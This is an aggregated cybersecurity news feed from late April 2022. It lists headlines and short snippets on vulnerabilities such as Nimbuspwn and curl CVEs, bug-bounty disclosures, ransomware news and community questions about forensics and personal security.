    ExtraReplica: cross-account database vulnerability in Azure PostgreSQL
    submitted by /u/sagitz_
    nimbuspwn detector (CVE-2022-29799 & CVE-2022-29800) - check whether local system is possibly vulnerable
    submitted by /u/SRMish3
    FindFunc: An IDA plugin for advanced function matching by assembly template, constants, string/name/byte reference
    submitted by /u/feberx
    Elevation of privilege Linux vulnerability: Nimbuspwn
    submitted by /u/0xdea
  • Open

    Chrome 102: Window Controls Overlay, a Host of Finished Origin Trials, PWAs as File Handlers and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 102 is beta as of April 28, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Window Controls Overlay for Installed Desktop Web Apps Window controls overlay extends an app's client area to cover the entire window, including the title bar, and the window control buttons (close, maximize/restore, minimize). The web app developer is responsible for drawing and input handling for the entire window except for the window controls overlay. Developers can use this feature to make their installe…
  • Open

    War in Ukraine / April 27
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    Gamified Vaults: Play, Find, Get Paid
    Hats Finance is introducing gamified vaults to the mix, allowing developers, white hats and security experts to test their Solidity… Continue reading on Medium »
    Contact Point Deanonymization Vulnerability in Meta
    This post is about a bug that I found on Meta (aka Facebook) which could be used to find the linked primary email address of an account using a mobile… Continue reading on Medium »
    We Rescued $4M from Rari Capital. But Was It Worth It?
    On April 6th, we discovered a verified Fuse pool in Rari Capital used a weak price oracle prone to manipulation. Usually, exploiting a… Continue reading on Medium »
    Subdomain Takeover using Mobile??
    Go to https://virustotal.com. Click on search section enter domain and click on search. Continue reading on Medium »
    It’s All About DMARC
    Hello Everyone, Continue reading on Medium »
  • Open

    SecWiki News 2022-04-28 Review
    On-chain tracing: money-laundering techniques explained, TRON edition by ourren. For more of the latest articles, visit SecWiki
  • Open

    NFT Crime: From the Simple to the Ingeniously Simple
    If you guessed these two things—a 10-kilo bar of gold and this image from the Bored Ape Yacht Club (BAYC)—cost about the same, roughly $600,000, you’d be right. And if it’s hard to believe this is true, you’d be like almost everyone else in the world. Basically, a one-of-a-kind cartoon in a type of video... The post NFT Crime: From the Simple to the Ingeniously Simple appeared first on TrustedSec.
  • Open

    PicoCTF 2022 Web Exploitation
    Hacking IPMI and Zabbix in HackTheBox — Shibboleth
  • Open

    What’s your favorite UEBA these days?
    I'm growing tired of Exabeam at a medium sized enterprise. Just using AA, feeding it from a data lake. I've been looking into it, but it can be difficult to cut through marketing jargon to determine if the tools are just SIEMs or if they do the modeling of a UEBA. submitted by /u/justaninfosecaccount
    Legal Defense asking for Google Username/Password?
    I have a friend who is preparing for a legal defense (defamation case.) The company he hired to help prepare the defense asked for all case-associated email. They also asked for the his and his teams Google accounts and passwords to "do the email search for them." Obviously no one is going to share that level of access, but is asking enough of a red flag to fire the preparation company? Is this a common accepted ask for permission? Any frame of reference here? submitted by /u/Freakskull [link] [comments]
  • Open

    Mastering SSTI from 0 to 1
    SSTI is injection into a template engine; this walks from simple probing to constructing your own EXP.
    FreeBuf Morning Report | Beijing Health Kit hit by cyberattack from overseas; documents reveal Facebook's unlawful use of user data
    On April 28, Beijing Health Kit was hit by a cyberattack during its peak usage period. Preliminary analysis traced the attack to overseas sources; Health Kit services were not affected during the attack.
    On-chain tracing: an introduction to coin-laundering techniques on TRON
    There is no mixer on TRON, so how do hackers launder coins?
    Roundup of the latest global cyberattacks: government & enterprise
    Government & enterprise: a roundup of representative incidents among the latest cyberattacks worldwide
    Linux Nimbuspwn vulnerabilities could let attackers deploy sophisticated threats
    Attackers could exploit the vulnerability for a range of malicious activity.
    Little impact: Conti activity has only grown since its data leak
    Researchers at Secureworks, the Dell-owned security company, say that despite the recent leak of its internal data, the Conti ransomware gang remains very active.
    Gartner: 3 must-have tools for responding to cybersecurity incidents
    According to information disclosed by Gartner, the average cost of a security breach in 2021 reached a 17-year high.
    US offers $10 million reward for information on 6 members of Russia's Sandworm group
    The US government is offering a reward of up to $10 million for six Russian hackers.
    The top 15 most exploited vulnerabilities of 2021 are out, list attached
    In a joint advisory, cybersecurity authorities further urge enterprises and organizations to patch these vulnerabilities promptly and implement a patch management system to reduce the exposed attack surface.
    Number of exposed databases hit a record high in Q1 this year, with Redis in first place
    In the first quarter of 2022, the peak number of exposed databases reached 91,200, an all-time record.
  • Open

    Automate Active Directory(Installation(Packer)+Provisioning(Vagrant))
    Hi Readers, Here we will be looking into automation of ad deployment. This challenge is part of Auror Project initiative by Zscaler’s… Continue reading on Medium »
  • Open

    subdomain takeover (abandoned Zendesk .easycontactnow.com)
    8x8 disclosed a bug submitted by bx_1: https://hackerone.com/reports/1486670
  • Open

    New dork here, nice place.
    I am confused how this entirely works though. I tried drive.google.com/drive/folders and it just wanted to log me into my own google drive? So I’ve tried using a few of the front ends, and they’re nice. I just don’t feel like I’m stomping through the mud like I wanted, you know? So how does one do the basic, dig through random unsecured files thing? Also, what is a percentage chance I find something fun/dangerous? Glad to be here folks! submitted by /u/Mr_Goodnite
    A lot of old 3D Images, ranging from 1996-2006
    submitted by /u/cicada-man
  • Open

    RFC 9116: A File Format to Aid in Security Vulnerability Disclosure
    Article URL: https://www.rfc-editor.org/rfc/rfc9116 Comments URL: https://news.ycombinator.com/item?id=31188124 Points: 1 # Comments: 0

  • Open

    Undesignated File during Examination
    When you examine a mobile data set case where the data is previously extracted and your files are not designated, what is the methodology to turn them into workable data like a .db file? My extraction folder is essentially the usual plist and mbdb files and a 1kb to 2000kb series of files like: Description: 5435435hjhj45454521 Type: File. Any terminology or process to explain or aid my google research would be immensely helpful submitted by /u/CharsCour
    What’s after LE forensics?
    Hello InfoSec peeps, I have been a digital forensic analyst for a law enforcement organisation in the UK for about 3 years now. I love digital forensics but the work within law enforcement has become extremely tedious for several reasons which I assume most of you will be aware of (prohibited images being 90% of the work + not a massive amount of actual analysis going on due to the first reason as more often than not there is no need). I have experience with the majority of forensic tools you’d expect LE to have and am very well informed regarding laws and legislation. In addition to this, I have very good InfoSec knowledge from self study and research. I am now beginning to explore other career paths but I am slightly lost as to what my potential next steps and career trajectory could…
    Champlain College: M.S. in DF or M.S. InfoTech with DFIR Concentration
    My hope is to enter a digital forensics role, but I also don’t want to pigeonhole my career to only be able to do that. Would I be better off doing InfoTech with DFIR? submitted by /u/invictusliber
  • Open

    Looking For Vulnerable Redis Servers (CVE-2022-0543)
    submitted by /u/chicksdigthelongrun
    DEGU: userland kit that doesn't use sys_clone/sys_execve call to run
    submitted by /u/Background-Degree-50
    A flow-based IDS using Machine Learning in eBPF
    submitted by /u/paran0ide
    Reverse Engineering PsExec for fun and knowledge
    submitted by /u/CyberMasterV
    Hands-on lab for exploiting Psychic Signatures in JWTs
    submitted by /u/DebugDucky
    Encrypting our way to SSRF in VMWare Workspace One UEM/Airwatch (CVE-2021-22054)
    submitted by /u/FireFart
    Kubernetes Security Series - https://smart7.in/2022/03/30/Kubernetes-Cluster-Attack-Defense-Importance-of-Network-Policies.html
    submitted by /u/agrawal7
    Package Planting: Are You [Unknowingly] Maintaining Poisoned Packages?
    submitted by /u/mkatch
    CVE-2021-22204 : Exploiting remote code execution within VirusTotal platform in order to gain access to its various scans capabilities
    submitted by /u/Late_Ice_9288
  • Open

    Weird PDF to my gmail account that I accidentally opened in gmail
    Hi everyone, did a bit of a stupid thing recently. Got this email by an address with a perfectly normal name and there was a pdf attached to it. I didn't really think much about it (because I get these regularly for university) and clicked the attachment so that it opened in that weird gmail viewer. I didn't download it, just clicked the attachment. I didn't actually know the email address, just clicked without thinking. Then I realized that the body of the email was just gibberish letters and numbers with spaces arbitrarily between, something like "ashene qlossa 90442 12394" and so on (would prefer not to copy paste the entire thing here in case it's something actually meaningful to someone). Obviously not legitimate. The attachment itself started as this sex website advertisement thing, but the further you went down, it was just weird numbers and lines in different colors. When I saw that, I closed the attachment immediately. I realized that the .pdf had a link attached over the entire thing (all of the pdf was attached to a different website essentially), but I didn't click, just had the attachment open for 2-3 seconds tops. So my question is... could anything bad have happened while I had the pdf open in the gmail viewer? Full Windows defender scan didn't show anything afterwards and the pdf is safe according to virustotal, which just confused me more because obviously the pdf has to be unsafe in some way, right? Sorry for the rambling post, I'm just a bit unsure about what exactly this is. Would appreciate any help. submitted by /u/Pronounta
    Compromised Internet Router (need advice)
    Is it possible that someone that had access to my router installed a firewall program and is restricting my access to certain sites? I ask because I am able to access said site on my mobile device on my mobile data, and when I use a mobile data hot spot on my PC; however when I connect to my WiFi I can't gain access to said site on my PC or my mobile. Any advice on how to detect such a thing or to prevent such a thing from occurring again would be greatly appreciated. submitted by /u/Severe_Document2108
    Password Manager with Blind Autofill?
    Looking for a psw manager that can fill fields without displaying the information. I.e. a saved credit card can be used to make purchases by a registered low permissions user without being displayed in manager / in browser after filled. Please let me know if you know any solution that fits the bill thx. submitted by /u/polloloco067
    Where do you store shared QR Codes?
    Looking for any solutions anyone has for storing shared QR codes. For example, one that might be needed for an Authenticator rotating one-time-password app that a team of people share. The ideal solution would be the same place a shared password is kept for one-stop shopping for these types of secrets. submitted by /u/Johnny_BigHacker
    Seeking Advice: moving from productivity based in a security firm to high level individual contributor and primary security expertise -- how to quickly adapt?
    Salutations! I believe this may be the right place to ask so here goes: Background: I worked my way up from help desk into security, and now I'm professional level (5+ years). My previous positions have all been with technically gifted security firms where there were several layers of professionals and safety nets above me and below me; both in terms of expertise and relationships. Being around fellow security specialists day in and day out is a privilege I didn't previously realize. Situation: I currently am a new hire to a company whose maturity model is still being developed and I am now one of the few primary security disciplines on staff and work with a cross functional team who are all people leaders. This is intimidating and somewhat stressful, I know deep down I am capable to…
    Sysmon for SME <50 employees?
    I'm an IT jack-of-all-trades / master-of-none for a small business with about 40 users give or take. I'm also thinking of pursuing a career in Netsec seeing as I basically have my own environment to play with... I've taken great strides in Netsec and going to be sitting my CISSP soon. Have implemented endpoint security, tidied up AD (particularly admin) accounts, set up 3-2-1 backups, etc etc Anyway my question is on the SIEM side. Being a small business I've found SIEMs a) very expensive and b) hard to get my head around. One suggestion I've seen a few times is enabling sysmon and using some kind of opensource product to monitor - GRR? SNORT? - Is sysmon going to eat up resources (per device?) - Being a newbie/scrub, will I get meaningful info? Is this worth pursuing? Is this a must? I do have time and energy to invest in this. Appreciate any responses and hopefully not too much scoffing at my noobness! submitted by /u/saladnicoise
    Search engine pre-registration (criminal ip ????)
    I'm currently a student studying vulnerability and security. I mainly use OSINT and search engines to study security. I know that there are many products for the search engine, such as Censys and shodan. I used Shodan for a certain period of time, but first of all, I felt that the performance was good. But as a student, there is a burden in terms of price. So I once shared a list of search engines that people use in the OSINT community, and there was a search engine called Criminalip. It's a search engine similar to Shodan, and the functions are very similar. But as I'm just starting to study security, I still don't know which search engines are highly utilized. So I'm trying to use this and that. This time, that criminal ip has registered for the beta test, and I registered in advance and got a free pass for 6 months. If there are students who have a price burden to use Shodan, I think you can refer to it. Below is the list of search engines that I shared before and the criminal ip url that I applied for the beta test. Oh! And since it's sharing for studying, I hope you don't think it's a promotion or an advertisement! https://criminalip.io https://www.reddit.com/r/OSINT/comments/u0yv15/search_engines_for_people_doing_osint/?utm_source=share&utm_medium=web2x&context=3 submitted by /u/Alexiosplana
  • Open

    RFC 9116: A File Format to Aid in Security Vulnerability Disclosure
    Article URL: https://www.rfc-editor.org/rfc/rfc9116.html Comments URL: https://news.ycombinator.com/item?id=31184926 Points: 5 # Comments: 0
    VirusTotal debunks claims of a serious vulnerability in Google-owned antivirus
    Article URL: https://portswigger.net/daily-swig/virustotal-debunks-claims-of-a-serious-vulnerability-in-google-owned-antivirus-service Comments URL: https://news.ycombinator.com/item?id=31182396 Points: 2 # Comments: 1
    Commit Level Vulnerability Dataset (For Android)
    Article URL: https://blog.quarkslab.com/commit-level-vulnerability-dataset.html Comments URL: https://news.ycombinator.com/item?id=31180203 Points: 1 # Comments: 1
    Microsoft finds new elevation of privilege Linux vulnerability, Nimbuspwn
    Article URL: https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ Comments URL: https://news.ycombinator.com/item?id=31179270 Points: 15 # Comments: 1
  • Open

    NASA FTP with data organized by mission, and some file conversion software too
    The Space Physics Data Facility (SPDF) hosts the NASA non-solar heliophysics archive of current and past heliophysics missions and related ground-based and non-NASA data. https://spdf.gsfc.nasa.gov/pub/ submitted by /u/osendai
    dorky band photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    pictures of antiques
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    Many, many pictures of clothes and accessories on display.
    submitted by /u/HGMIV926
  • Open

    Passive Reconnaissance Using Only Kali Terminal | Infosec |
    Disclaimer: This blog is only for educational purpose. Continue reading on System Weakness »
    You need to hear this if you are new/want to start bug hunting
    Hello everyone, Continue reading on Medium »
    Bypassing WAF for $2222
    I know it’s been a very long time since I last published my article on how I was able to find RCE on Bentley systems. For the last 1–1.5… Continue reading on Medium »
    AD Pentesting Notes
    If you just have access to an AD environment but you don’t have any credentials/sessions you could: Pentest the network: Scan the network… Continue reading on Medium »
    4EVERLAND officially launches the “First Leap Program” with prizes of up to 15 million 4EVER
    Greetings to all users, Continue reading on Medium »
  • Open

    War in Ukraine / April 26
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    What are red-blue teams in hacking?
    A red team is an offensive security professional with expertise in breaking into defenses and attacking systems. A blue team, on the other… Continue reading on Medium »
    What are the types of white box testing?
    White box testing happens to be a form of software testing, which assesses the internal working structure of an application. It also… Continue reading on Medium »
  • Open

    FreeBuf Morning Report | British Army recruitment site offline for over a month after data breach; New York may make crypto fraud a criminal offense
    Starting April 27, Google is rolling out app privacy policies in Google Play, the official Android app store; Android users will be able to see what private data an app collects (and for what purpose and use).
    Confirmed: Coca-Cola acknowledges cyberattack and opens investigation
    Coca-Cola, the world's largest soft drink maker, confirmed in a recent statement that its networks were attacked and that an investigation into the attack is under way.
    Android trojan VajraSpy poses as a chat app, targeting the Pakistani military
    Researchers found that the APT-Q-43 group is using the VajraSpy trojan, disguised as a chat app called Crazy Talk, to attack Pakistani military personnel.
    Ningbo Commerce Bank Co., Ltd. is hiring for security management positions
    Ningbo Commerce Bank Co., Ltd. is hiring 2 security management staff.
    Building and evolving a software composition analysis (SCA) capability
    This article describes the process of actually rolling out an SCA capability inside an enterprise, the problems encountered, and views on and prospects for SCA technology.
    Hackers exploit critical VMware RCE vulnerability to install backdoors
    Advanced hackers are actively exploiting CVE-2022-22954, a critical remote code execution (RCE) vulnerability affecting VMware Workspace ONE Access.
    Report officially released: “China's ‘Cybersecurity Universe’: Efficient Operations from Security Services to MSS”
    To understand the strategic significance of managed security services (MSS) for China's cybersecurity development, FreeBuf Consulting conducted in-depth research combining quantitative and qualitative analysis.
    Black Basta ransomware attacks the American Dental Association
    The American Dental Association has suffered a cyberattack. The association is actively investigating the incident and has shut down some network systems.
    Cybersecurity added to the performance evaluation of central state-owned enterprise executives
    The Measures bring cybersecurity into the scope of evaluation and impose corresponding sanctions on executives depending on the severity of incidents, further raising central SOEs' ability to guard against major cybersecurity incidents.
    Full translation of the Dirty Pipe vulnerability report
    A translation of the English Dirty Pipe vulnerability article; some memory locations in the text were modified because they involved sensitive characters.
    Is Log4Shell old news? The attack surface is still large
    Research shows that patching of Log4Shell is far from complete, with many organizations still running outdated or vulnerable versions.
    A call from the “New Forces in Cybersecurity”, pick up!
    The “New Forces in Cybersecurity Solo Launch Season” invites you to join in!
  • Open

    SecWiki News 2022-04-27 Review
    Advanced CodeQL (Java) by ourren; Learning features from source-code control-flow graphs to locate defects by ourren; A blueprint for evading industry leading endpoint protection in 2022 by ourren. For more of the latest articles, visit SecWiki
  • Open

    Confused by agents? We've cleaned up our jargon ...
    Speaking to Burp Suite Enterprise Edition users, one thing has come up time and time again as a blocker to your understanding of the product. This has been our use of the term "agent" when describing
    Burp Suite Enterprise Edition: config tips for scanning success
    Burp Suite Enterprise Edition is the dynamic web vulnerability scanner that can help you to secure your whole portfolio. To help you achieve that, this article contains some advice on how to optimize
  • Open

    Container escape on public GitLab CI runners
    GitLab disclosed a bug submitted by ec0: https://hackerone.com/reports/1442118
    CVE-2022-27776: Auth/cookie leak on redirect
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1547048
    CVE-2022-27775: Bad local IPv6 connection reuse
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1546268
    CVE-2022-27774: Credential leak on redirect
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1543773
  • Open

    Using PGP to enhance security and non-repudiation of terraform ops
  • Open

    What is the one thing ( or skill ) that you should focus on in exploit dev?
    submitted by /u/morizk90
    developing a remote exploit for a stack overflow in Linux CVE-2022-0435, not including KASLR
    submitted by /u/ozxsl2w3kejkhwakl
  • Open

    A look inside the homeland security agency reveals a large number of deficiencies
    Continue reading on Medium »
    Untitled
    Self XSS Continue reading on Medium »
    My Pentest Log -16- (XS Size A Little Tip)
    Greetings to all from a springtime Constantinople, Continue reading on Medium »
  • Open

    KrbRelayUp - local privilege escalation in Windows domain environments where LDAP signing is not enforced
    submitted by /u/0xdea
    Introduction to VirtualBox security research and fuzzing
    submitted by /u/nibblesec
    Thinkstscapes Q1 2022 research round-up
    submitted by /u/ranok
    New CloudGoat scenario: Vulnerable-by-Design Lambda functions
    submitted by /u/hackers_and_builders
  • Open

    Vulnerability Roundup – April 2022
    Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes of website compromises. To help educate website owners on emerging threats to their environments, we’ve compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this past month. Remote Code Execution (RCE) Elementor WordPress Plugin Installations: 5,000,000+ Patched Version: 3.6.3 Vulnerability: Remote code execution (RCE) Severity: Critical CVE: CVE-2022-1329 This critical vulnerability leverages a lack of capability checks found in vulnerable versions of the Elementor plugin. Continue reading Vulnerability Roundup – April 2022 at Sucuri Blog.
  • Open

    SQL Injection on https://soa-accp.glbx.tva.gov/ via "/api/" path - VI-21-015
    Tennessee Valley Authority disclosed a bug submitted by yassinek3ch: https://hackerone.com/reports/1125752
    Stored XSS in "product type" field executed via product filters
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1404770 - Bounty: $500
    RCE via exposed JMX server on jabber.37signals.com/jabber.basecamp.com
    Basecamp disclosed a bug submitted by ian: https://hackerone.com/reports/1456063 - Bounty: $100
  • Open

    Windows Indexing Locations
    Hi all, I’m trying to see if a Windows 10 Pro computer was set up so that when a USB drive was connected, it would index the files/folders on the drive. Does anyone know where this information is stored? I’m thinking it’s a registry key but I’m not finding too much info online about it. Thanks in advance. submitted by /u/hotsausce01
  • Open

    OSINT of website…
    Let’s look at the topic of information sources for OSINT research of websites today. I’ll be interested to learn about the personalities… Continue reading on Medium »
    War in Ukraine / April 25
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Will Elon Musk Revolutionize The World of OSINT and Campaigns?
    Elon Musk’s effort to acquire Twitter passed an important milestone yesterday when Twitter’s Board of Directors recommended to accept his… Continue reading on Medium »
  • Open

    Finding IP addresses in a Network
    When you land on a huge big network with several VLAN’s and are unsure of where to look or start! Continue reading on Medium »
    TryHackme — Alfred(Exploit Jenkins Service Gain To Authority/System)
    Hi everyone, in this article I will share a write-up of the TryHackMe machine named Alfred; this machine focuses on Jenkins technology… Continue reading on Medium »
    gcpHound v2.0 : Django Web UI To Analyze IAM Permissions
    In this article, we will talk about recent functionalities added to the gcpHound as well as how to use them. Continue reading on Medium »
  • Open

    Advanced Docker Security Part II
    Introduction Continue reading on InfoSec Write-ups »
    Tryhackme: Anonymous
    Tryhackme: AgentSudo
  • Open

    Microsoft finds new elevation of privilege Linux vulnerability, Nimbuspwn
    submitted by /u/SCI_Rusher
  • Open

    SecWiki News 2022-04-26 Review
    Overview of the lab-assignment platform for the Software Analysis course by ourren; Notes on the pitfalls of automated scanning with xray linked to crawlergo by sinver; Dumping Lsass credentials via remote process forking by sinver; A full walkthrough from finding a vulnerability during a HW drill to domain controller takeover by sinver; A Discuz X3.4 admin-panel getshell by sinver; A small trick for obtaining domain controller hashes without AV evasion by sinver; Obtaining all domain controller hashes via the ProxyShell vulnerability by sinver; Essential red-team skills: stealth techniques by sinver; An ethical anti-fraud system for mobile payments by ourren; Pentest_Note: routine penetration-testing operation notes by ourren. For more of the latest articles, visit SecWiki
  • Open

    Overwhelmed by vulnerabilities? Here’s the best way to prioritize them.
    We know that software vulnerabilities remain one of the primary causes of external attacks. We also know that on average, vulnerabilities are exploited for the first time just days after they’re disclosed. You may be managing many third-party applications, so how can you make sure you can drive remediation and reduce the risk for all your software? Once vulnerabilities are discovered, how will you know which ones should be prioritized? A common misconception is that every vulnerability in your organization should be addressed immediately, but keeping up with vulnerability disclosures that affect your environment is a constant, ongoing challenge. It…
  • Open

    Writing test code for Stdin in Go
    When writing test code, function argument values we can predict are easy to check, but data that comes in from the system makes you wonder how to go about it once you actually sit down to write the test. Today I want to talk about one such case: writing test code for Stdin. Pipe trick Stdin can be controlled in test code using os.Pipe() and a simple trick. os.Pipe() First, os.Pipe() has the return values shown below. And reading its description, the first return value r and the second return value w are File objects connected to each other.
  • Open

    CVE-2022-24706: Apache CouchDB Remote Privilege Escalation
    Article URL: https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00 Comments URL: https://news.ycombinator.com/item?id=31167557 Points: 2 # Comments: 1
  • Open

    Defending the Gates of Microsoft Azure With MFA
    Since Russia’s invasion of Ukraine, companies based in the United States have been on alert for potential cyberattacks on IT infrastructure. Multi-Factor Authentication (MFA) has been one of the most recommended settings for organizations to turn on. Recently, the White House issued a FACT SHEET on how organizations can protect themselves against potential cyberattacks from... The post Defending the Gates of Microsoft Azure With MFA appeared first on TrustedSec.
  • Open

    Java code audit: analysis and exploitation of dangerous functions (Part 2)
    Starting now, I will continue sharing the problems I ran into while studying code auditing and my own reflections from learning.
    Interview with F5's Chen Liang: applications and security in the digital wave
    How to effectively relieve the pressure of surging applications, mitigate enterprise cybersecurity risk, and let digital transformation proceed safely is a problem enterprises need to solve.
    FreeBuf Morning Report | Iranian hackers exploit RCE vulnerability to deploy backdoors; BotenaGo variant targets Lilin cameras
    The threat actor Rocket Kitten is actively exploiting the VMware vulnerability to gain initial access and deploy the Core Impact penetration testing tool on systems.
    Tophant's attack-and-defense drill handbook series: unsheathing the sword
    The 2022 large-scale attack-and-defense drills are coming; are you ready?
    Book giveaway | For building enterprise data security, this book is indispensable!
    “A Practical Guide to Data Security” explains each process area of the full data security lifecycle one by one and offers practical recommendations.
    Iran announces it foiled large-scale cyberattacks on public services
    Iranian state television recently announced that several large-scale cyberattacks targeting public services run by government and private organizations had been foiled.
    CISA adds 7 new vulnerabilities to its exploited-vulnerabilities list
    CISA has added 7 vulnerabilities to its list of actively exploited security issues.
    Virus spreads via the 驱动人生 (Driver Life) update channel and a high-severity vulnerability, infecting tens of thousands of PCs in half a day on December 14
    On December 14, a virus spread via the 驱动人生 (Driver Life) update channel and a high-severity vulnerability, infecting tens of thousands of PCs in half a day.
    Google fixes high-severity RCE vulnerability in the VirusTotal platform
    A security vulnerability appeared in the VirusTotal platform that attackers could exploit to achieve remote code execution.
    US accuses North Korean APT of using new malware to attack journalists
    On April 25 local time, the US news site NK News said it had found the North Korea-backed APT37 using a new malware sample to attack journalists covering North Korea.
    Russia-Ukraine conflict drives DDoS attacks to an all-time high
    Compared with Q4 2021, DDoS attacks in Q1 2022 increased by 46%, with most of them directed at Russia.
  • Open

    File Formats
    Having an understanding of file formats is an important factor in DFIR work. In particular, analysts should understand what a proper file using a particular format should look like, so that they can see when something is amiss, or when the file itself has been manipulated in some manner. Understanding file formats goes well beyond understanding PE file formats and malware RE. Very often, various Microsoft file formats include data, or metadata (defined as "data about data") that can be mined/parsed, and then leveraged to tremendous effect, furthering overall analysis and intelligence development, often across multiple cases and campaigns. LNK Windows shortcut, or LNK files, have been covered extensively in this blog, as well as other blogs, in addition to having been well documented by MS…

  • Open

    Trying to carve Office documents but they always open corrupted, Help pls
    submitted by /u/KTthemajicgoat
    Quantum ransomware analysis
    New week, new report! This time me, 0xtornado and svch0st collaborated on a #QuantumRansomware compromise. ➡️ ISO file ➡️ PsExec ➡️ *attacker hostname* TERZITERZI ➡️ much more! https://thedfirreport.com/2022/04/25/quantum-ransomware/ submitted by /u/samaritan_o
    Extract Bitlocker Clear Key?
    Hi, I got 2 Bitlocker encrypted drives on which Bitlocker itself is disabled, so there must be a Clear Key stored on the drive. I can access the data with Magnet Axiom, which autodiscovered the key, but I want to run some other examinations with other tools on it. So my question is, does anybody know where exactly the Clear Key is stored? Thanks for any help submitted by /u/kaibring
  • Open

    Local file disclosure through SSRF at next.nutanix.com
    Nutanix disclosed a bug submitted by tosun: https://hackerone.com/reports/471520
    Force User to Accept Attacker's invite [ Restrict user to create account]
    Krisp disclosed a bug submitted by sammam: https://hackerone.com/reports/1420070 - Bounty: $100
    Visibility Robots.txt file
    Krisp disclosed a bug submitted by razahack: https://hackerone.com/reports/1450014
    Xss triggered in Your-store.myshopify.com/myshopify.com/admin/apps/shopify-email/editor/****
    Shopify disclosed a bug submitted by danishalkatiri: https://hackerone.com/reports/1472471 - Bounty: $2900
    CURLOPT_SSH_HOST_PUBLIC_KEY_SHA256 comparison disaster
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1549435
    CURLOPT_SSH_HOST_PUBLIC_KEY_MD5 bypass if string not 32 chars
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1549461
  • Open

    ClusterFuzz is a scalable fuzzing infrastructure
    Article URL: https://github.com/google/clusterfuzz Comments URL: https://news.ycombinator.com/item?id=31160965 Points: 2 # Comments: 0
  • Open

    What you doing wrong when you fail at bug bounties?
    Hi all, I hope all is well. I have 3+ years bug bounty experience so I want to talk about the common mistakes when doing bug bounty… Continue reading on Medium »
    Open-Redirects
    Most of time you have seen that when you go to a website and try to access some page which require a user to login first, it redirects you… Continue reading on Medium »
    The time I hacked a Fortune 500 company, but it was out of scope.
    Hi :) thanks for taking some time to read my blog post. This is a short post about a bug I found during my testing of a Fortune 500… Continue reading on Medium »
    Improper cookie not expiring after logged out!
    hey folks! I'm Mujibur Rahman from Chennai and I’m a security researcher Continue reading on Medium »
    fuzzing and credentials leakage..nice bug hunting writeup
    Here you find a beautiful write-up with useful tips :) Continue reading on Medium »
    Unlock any blur text/picture without membership/subscription on Scribd.com |By Neuchi
    hi, I'm Neil Harvey Miñano. 5 days ago I found a vulnerability on scribd.com when I was finding a dork for google sqli Continue reading on System Weakness »
  • Open

    HOW TO ENCRYPT FILE SYSTEM IN RHEL 8
    Hi, I seek your counsel on a way to encrypt a file system partition (i.e /encrypted_data) containing sensitive data file .txt with RBAC on top to allow only application users to access those files, admin access should be restricted with the objective to comply with PCI-DSS. steps are available for that on AIX using efskeymgr however I'm looking for similar steps for Linux. http://www.asgaur.com/wp/how-to-encrypt-file-system-in-aix/ ​ thank you, submitted by /u/Sparthans [link] [comments]
    Looking for resources on industry best practices
    I'm looking for resources for learning about Industry best practices for correcting/dealing with typical vulnerability classes. Blogs, whitepapers, YouTube channels, whatever you find helpful would be much appreciated. This came up as recommended knowledge for an interview for a Product Security Engineer position. This would be primarily dealing with web apps but I'm open for infrastructure security as well. Thanks in advance!!! submitted by /u/rbl00 [link] [comments]
    Help understanding facebook account hijacking?
    I am not looking for advice, just information. Obviously there are multiple motives for hijacking a Facebook account. Specifically I am curious about its use for anonymity. I imagine it could be used in a similar way as someone might use someone's offline identity and/or credit cards to cover their tracks. My friend's account got hijacked by a random and it appears to be being used for foreign political propaganda. Is it easier to hijack an account than to make an anonymous one? At least one that would be difficult for local law enforcement or something to trace? Would it circumvent something, make them harder to find? What would be, or likely be, the benefits/motive for doing it this way? I feel like there's more to this that I'm not seeing and I'm curious. submitted by /u/fright_end [link] [comments]
  • Open

    Static unpacker and decoder for Hello Kitty Packer
    submitted by /u/GelosSnake [link] [comments]
  • Open

    War in Ukraine / April 24
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Incognito 3.0 OSINT Writeups
    1. ICTF Continue reading on Medium »
  • Open

    SecWiki News 2022-04-25 Review
    SecWiki Weekly (Issue 425) by ourren; Building and evolving Software Composition Analysis (SCA) capability by ourren. For more of the latest articles, visit SecWiki
  • Open

    Facebook’s big vulnerability
    Article URL: https://thebucketreport.com/video/facebooks-big-vulnerability Comments URL: https://news.ycombinator.com/item?id=31155935 Points: 35 # Comments: 79
    Vulnerability of avian populations to renewable energy production
    Article URL: https://royalsocietypublishing.org/doi/10.1098/rsos.211558 Comments URL: https://news.ycombinator.com/item?id=31155272 Points: 1 # Comments: 0
  • Open

    Dreaming While Awake
    Interview with Professional Social Engineer — Jenny Radcliffe! Continue reading on ILLUMINATION »
  • Open

    Defeating BazarLoader Anti-Analysis Techniques
    Anti-analysis techniques make it harder for malware analysts to do their work. We cover BazarLoader anti-analysis techniques and how to defeat them. The post Defeating BazarLoader Anti-Analysis Techniques appeared first on Unit42.
  • Open

    Cyberspace Administration of China and two other departments issue the "2022 Work Plan for Further Advancing Large-Scale IPv6 Deployment and Application"
    By the end of 2022, IoT IPv6 connections are to reach 180 million, IPv6's share of fixed-network traffic 13%, and its share of mobile-network traffic 45%.
    Google Project Zero report reveals global trends in 0-day exploitation for 2021
    During 2021 Google detected and disclosed 58 in-the-wild 0-days, a record since the project was founded in 2014.
    Through the Hack DHS program, 122 security vulnerabilities have been found in US Department of Homeland Security systems
    Bounty hunters who joined the "Hack DHS" bug bounty program have found 122 security vulnerabilities in DHS's external systems.
